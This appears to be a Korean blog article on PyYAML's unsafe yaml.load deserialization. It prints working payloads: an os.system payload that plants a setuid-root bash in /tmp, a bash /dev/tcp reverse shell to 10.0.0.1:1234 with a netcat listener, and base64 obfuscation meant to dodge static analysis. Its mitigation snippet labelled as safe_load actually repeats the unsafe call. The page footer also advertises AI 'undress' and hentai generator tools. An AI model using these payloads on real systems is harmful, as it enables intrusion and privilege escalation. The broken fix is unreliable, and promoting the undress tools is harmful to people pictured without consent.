Python의 YAML(YAML Ain't Markup Language) 라이브러리에 특정 조건에서 임의 명령을 실행할 수 있는 취약점이 있는 것으로 확인되었습니다. 안전 로더를 지정하지 않고 yaml.load 함수를 사용하면 취약점이 발생합니다. 기본적으로 yaml.load는 악성 페이로드에 대한 공격 표면을 생성하는 임의의 Python 개체를 실행할 수 있습니다.
임의 명령 실행을 통한 악용
근본적인 위험은 역직렬화 프로세스에 있습니다. YAML 문서에 악성 페이로드가 포함된 경우 yaml.load는 포함된 지시어를 처리하여 잠재적으로 코드 실행을 유도합니다. 예를 들어 다음 스니펫을 고려해 보세요.
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
여기서 yaml.load 함수는 example.yml을 제한 없이 구문 분석하므로 YAML 콘텐츠에 안전하지 않은 지시문이 포함된 경우 취약해집니다. 일반적인 익스플로잇 페이로드는 임의의 시스템 명령을 실행하도록 제작될 수 있습니다.
페이로드 예시
import yaml from yaml import Loader, UnsafeLoader # Malicious payload payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' # Exploitation yaml.load(payload) yaml.load(payload, Loader=Loader) yaml.load(payload, Loader=UnsafeLoader)
이러한 각 호출은 페이로드를 처리하여 /tmp/bash에 권한 있는 실행 파일이 생성됩니다. 그런 다음 이 바이너리는 높은 권한으로 실행될 수 있습니다.
/tmp/bash -p
이는 권한이 잘못 구성되었거나 기타 약점이 있는 시스템에서 취약점이 악용될 경우 권한 상승 가능성을 보여줍니다.
리버스 쉘 공격
특히 교활한 사용 사례는 리버스 셸의 취약점을 활용하는 것입니다. 이를 통해 공격자는 대상 컴퓨터에 원격으로 액세스할 수 있습니다. 이 프로세스에는 공격자의 컴퓨터에서 리스너를 시작하고 역방향 연결을 설정하도록 설계된 YAML 문서를 작성하는 작업이 포함됩니다.
공격자의 컴퓨터에서 Netcat 수신기를 시작합니다.
nc -lvnp 1234
대상 시스템에서 다음 Python 스크립트를 루트로 실행합니다.
import yaml # Reverse shell payload data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]' yaml.load(data) # Executes the reverse shell
이 페이로드는 대상 시스템에 공격자의 수신기에 다시 연결하도록 지시하여 실행 프로세스의 권한을 갖춘 완전한 대화형 셸을 제공합니다.
난독화를 위한 Base64 인코딩
기본 보안 제어나 필터를 우회하기 위해 페이로드를 Base64로 인코딩할 수 있습니다. 이 방법은 난독화 계층을 추가하여 잠재적으로 정적 분석 도구의 탐지를 회피합니다.
예
from base64 import b64decode import yaml # Base64-encoded payload encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity payload = b64decode(encoded_payload) # Execute the payload yaml.load(payload)
완화 기술
전문가는 이러한 취약점을 제거하기 위해 엄격한 코딩 관행을 채택해야 합니다. 권장되는 완화 조치는 다음과 같습니다.
-
세이프 로더 사용: yaml.load를 yaml.safe_load로 대체하여 임의 개체의 실행을 방지합니다.
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
입력 소스 제한: YAML 입력이 삭제되고 신뢰할 수 있는 소스에서만 생성되는지 확인하세요.
정적 분석 적용: 도구를 사용하여 코드베이스에서 안전하지 않은 yaml.load 호출을 검색합니다.
환경 강화: 악용으로 인한 영향을 최소화하기 위해 시스템 권한을 제한합니다. 예를 들어 컨테이너화된 환경을 사용하면 공격자의 권한 상승 능력이 제한됩니다.
YAML 라이브러리의 기본 동작은 Python과 같은 동적 유형 언어의 역직렬화와 관련된 위험을 보여줍니다. 이 취약점을 악용하려면 최소한의 정교함이 필요하므로 보안 애플리케이션 개발에 있어 우선순위가 높은 문제입니다. 이러한 위험을 효과적으로 완화하려면 강력한 입력 검증 및 런타임 보호 장치와 함께 안전한 코딩 방식을 채택하는 것이 필수적입니다.
위 내용은 Python에서 YAML을 사용할 때는 주의하세요! 보안 취약점이 있을 수 있음의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

Linux 터미널에서 Python 버전을 보려고 할 때 Linux 터미널에서 Python 버전을 볼 때 권한 문제에 대한 솔루션 ... Python을 입력하십시오 ...

이 기사에서는 HTML을 구문 분석하기 위해 파이썬 라이브러리 인 아름다운 수프를 사용하는 방법을 설명합니다. 데이터 추출, 다양한 HTML 구조 및 오류 처리 및 대안 (SEL과 같은 Find (), find_all (), select () 및 get_text ()와 같은 일반적인 방법을 자세히 설명합니다.

이 기사는 딥 러닝을 위해 텐서 플로와 Pytorch를 비교합니다. 데이터 준비, 모델 구축, 교육, 평가 및 배포와 관련된 단계에 대해 자세히 설명합니다. 프레임 워크, 특히 계산 포도와 관련하여 주요 차이점

Python의 통계 모듈은 강력한 데이터 통계 분석 기능을 제공하여 생물 통계 및 비즈니스 분석과 같은 데이터의 전반적인 특성을 빠르게 이해할 수 있도록 도와줍니다. 데이터 포인트를 하나씩 보는 대신 평균 또는 분산과 같은 통계를보고 무시할 수있는 원래 데이터에서 트렌드와 기능을 발견하고 대형 데이터 세트를보다 쉽고 효과적으로 비교하십시오. 이 튜토리얼은 평균을 계산하고 데이터 세트의 분산 정도를 측정하는 방법을 설명합니다. 달리 명시되지 않는 한,이 모듈의 모든 함수는 단순히 평균을 합산하는 대신 평균 () 함수의 계산을 지원합니다. 부동 소수점 번호도 사용할 수 있습니다. 무작위로 가져옵니다 수입 통계 Fracti에서

이 기사는 Numpy, Pandas, Matplotlib, Scikit-Learn, Tensorflow, Django, Flask 및 요청과 같은 인기있는 Python 라이브러리에 대해 설명하고 과학 컴퓨팅, 데이터 분석, 시각화, 기계 학습, 웹 개발 및 H에서의 사용에 대해 자세히 설명합니다.

이 기사는 Python 개발자가 CLIS (Command-Line Interfaces) 구축을 안내합니다. Typer, Click 및 Argparse와 같은 라이브러리를 사용하여 입력/출력 처리를 강조하고 CLI 유용성을 향상시키기 위해 사용자 친화적 인 디자인 패턴을 홍보하는 세부 정보.

Python의 Pandas 라이브러리를 사용할 때는 구조가 다른 두 데이터 프레임 사이에서 전체 열을 복사하는 방법이 일반적인 문제입니다. 두 개의 dats가 있다고 가정 해

이 기사는 프로젝트 종속성 관리 및 충돌을 피하는 데 중점을 둔 Python에서 가상 환경의 역할에 대해 설명합니다. 프로젝트 관리 개선 및 종속성 문제를 줄이는 데있어 생성, 활성화 및 이점을 자세히 설명합니다.


핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

AI Hentai Generator
AI Hentai를 무료로 생성하십시오.

인기 기사

뜨거운 도구

SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)

PhpStorm 맥 버전
최신(2018.2.1) 전문 PHP 통합 개발 도구

WebStorm Mac 버전
유용한 JavaScript 개발 도구

ZendStudio 13.5.1 맥
강력한 PHP 통합 개발 환경

MinGW - Windows용 미니멀리스트 GNU
이 프로젝트는 osdn.net/projects/mingw로 마이그레이션되는 중입니다. 계속해서 그곳에서 우리를 팔로우할 수 있습니다. MinGW: GCC(GNU Compiler Collection)의 기본 Windows 포트로, 기본 Windows 애플리케이션을 구축하기 위한 무료 배포 가능 가져오기 라이브러리 및 헤더 파일로 C99 기능을 지원하는 MSVC 런타임에 대한 확장이 포함되어 있습니다. 모든 MinGW 소프트웨어는 64비트 Windows 플랫폼에서 실행될 수 있습니다.
